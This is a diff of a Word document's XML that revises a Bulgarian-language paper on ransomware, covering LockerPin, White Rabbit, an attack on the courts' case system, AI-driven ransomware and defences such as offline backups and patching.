+        <w:t>"</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -5170,6 +5087,9 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> е първият </w:t>
       </w:r>
       <w:r>
@@ -5179,49 +5099,14 @@
         <w:t>malware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, който атакува мобилни системи. Потребителят инсталира </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">мобилно </w:t>
-      </w:r>
-      <w:r>
-        <w:t>приложени</w:t>
-      </w:r>
-      <w:r>
-        <w:t>е</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> от пиратски сайтове, но</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>, който атакува мобилни системи.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">към </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">него </w:t>
-      </w:r>
-      <w:r>
-        <w:t>се промъква и троянския кон</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LockerPin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Векторът на заразяване е изтеглянето на мобилни приложения от пиратски сайтове, в които е вграден троянският кон</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5231,6 +5116,12 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Троянският кон се опитва </w:t>
       </w:r>
@@ -5268,7 +5159,7 @@
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Ако потребителят се подведе и изпълни указанията, се сменя </w:t>
+        <w:t xml:space="preserve"> Ако потребителят се подведе и изпълни указанията се сменя </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5399,27 +5290,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>6</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5545,27 +5423,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>7</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>7</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5665,17 +5530,19 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">При </w:t>
-      </w:r>
+        <w:t>При „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>„</w:t>
-      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>spray</w:t>
+        <w:t>and</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5683,40 +5550,26 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>and</w:t>
+        <w:t>pray</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>" метода откупът е сравнително малък – стандартно около 300 долара, тъй като случайно избраните</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> метода киберпрестъпниците </w:t>
-      </w:r>
-      <w:r>
-        <w:t>получат малк</w:t>
-      </w:r>
-      <w:r>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> сума откуп – стандартно по 300</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">долара, защото таргетират случайни хора. От друга страна, при </w:t>
+      <w:r>
+        <w:t>трудно биха платили по</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>висока сума</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. От друга страна, при </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">Big </w:t>
@@ -5938,7 +5791,13 @@
         <w:t>(бял заек).</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> „Белият заек“ е малък по-размер (около 100</w:t>
+        <w:t xml:space="preserve"> „Белият заек“ е малък по</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>размер (около 100</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5965,7 +5824,37 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">При активиране, криптира файловете, изключва системните папки на </w:t>
+        <w:t xml:space="preserve">При активиране </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">се </w:t>
+      </w:r>
+      <w:r>
+        <w:t>криптира</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> файлове</w:t>
+      </w:r>
+      <w:r>
+        <w:t>те,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> изключв</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ат се </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">системните </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">директории </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5974,7 +5863,13 @@
         <w:t>Windows</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> и уведомява потребителите, че са обект на атака.</w:t>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> потребителите са уведомени</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, че са обект на атака.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5983,7 +5878,19 @@
         <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
-        <w:t>Атаката срива за седмици единната деловодна информационна система, използвана от всички административни съдилища по страната. Причина за атаката е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вируса се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернета. Единствените устройства, които остават невредими са тези, които не са били включени в интернет мрежата.</w:t>
+        <w:t xml:space="preserve">Атаката срива за седмици единната деловодна информационна система, използвана от всички административни съдилища </w:t>
+      </w:r>
+      <w:r>
+        <w:t>в</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> страната. Причина за атаката е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вируса се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернет</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> пространството</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Единствените устройства, които остават невредими са тези, които не са били включени в интернет мрежата.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Не е известно дали ВАС е заплатил откупа, но Висшият съ</w:t>
@@ -6214,10 +6121,19 @@
         <w:t xml:space="preserve">нови </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">по-персонализирани тактики, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>използва се за експлоатация на</w:t>
+        <w:t>по-персонализирани тактики</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>И</w:t>
+      </w:r>
+      <w:r>
+        <w:t>зползва се за експлоатация на</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> уязвимости и откупи</w:t>
@@ -6372,31 +6288,26 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Полиморфен</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">Полиморфен </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AI ransomware</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> - Традиционното разпознаване на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> атаки разчита на методи за детекция на често използвани модели. За да избегнат евентуална детекция</w:t>
+        <w:t>Класическите методи за засичане на ransomware се основават на разпознаване на характерни модели, наблюдавани при предишни атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. За да избегнат евентуална детекция</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -6450,7 +6361,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Автоматизация:</w:t>
+        <w:t>Автоматизация</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6565,24 +6479,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>8</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6970,27 +6874,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>9</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>9</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -7178,27 +7069,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>10</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>10</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7294,27 +7172,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>11</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>11</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Метод от класа, ко</w:t>
       </w:r>
@@ -8328,27 +8193,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>12</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8379,27 +8231,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>13</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>13</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8424,27 +8263,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>14</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>14</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8526,27 +8352,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>15</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>15</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Какво се визуализира първо на потребителя</w:t>
       </w:r>
@@ -8667,27 +8480,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>16</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
       </w:r>
@@ -8712,27 +8512,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>17</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>17</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8766,27 +8553,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>18</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>18</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8817,27 +8591,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>19</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>19</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8979,27 +8740,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>20</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Файловете са възстановени</w:t>
       </w:r>
@@ -9032,27 +8780,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>21</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>21</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -9085,27 +8820,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>22</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>22</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -9135,27 +8857,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>23</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>23</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -9311,21 +9020,7 @@
         <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Подготовката включва създаване и поддържане на офлайн криптирани резервни копия на критично важната информация, както и редовна проверка на тяхната изправност. От съществено значение е резервните копия да се съхраняват офлайн, тъй като повечето </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> атаки се опитват да открият и унищожат или криптират наличните архиви на системата, с което принуждават </w:t>
-      </w:r>
-      <w:r>
-        <w:t>потърпевшия</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> да плати откуп.</w:t>
+        <w:t>Подготовката включва създаване и поддържане на офлайн криптирани резервни копия на критично важната информация, както и редовна проверка на тяхната изправност. От съществено значение е резервните копия да се съхраняват офлайн, тъй като повечето ransomware атаки се опитват да открият и унищожат или криптират наличните архиви на системата, с което принуждават потърпевшия да плати откуп.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9574,7 +9269,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="360"/>
+        <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
         <w:t>Употребата на</w:t>
@@ -9650,10 +9345,7 @@
         <w:t xml:space="preserve"> апликации и </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>network</w:t>
+        <w:t>мрежови</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9667,6 +9359,11 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
       <w:r>
         <w:t>Честа</w:t>
       </w:r>
@@ -9688,7 +9385,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="360"/>
+        <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е </w:t>
@@ -9708,156 +9405,161 @@
       <w:r>
         <w:t xml:space="preserve"> свързани с </w:t>
       </w:r>
+      <w:r>
+        <w:t>обработването</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
+      </w:r>
+      <w:r>
+        <w:t>браузери</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и плъгини. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Малкият и средният бизнес често има</w:t>
+      </w:r>
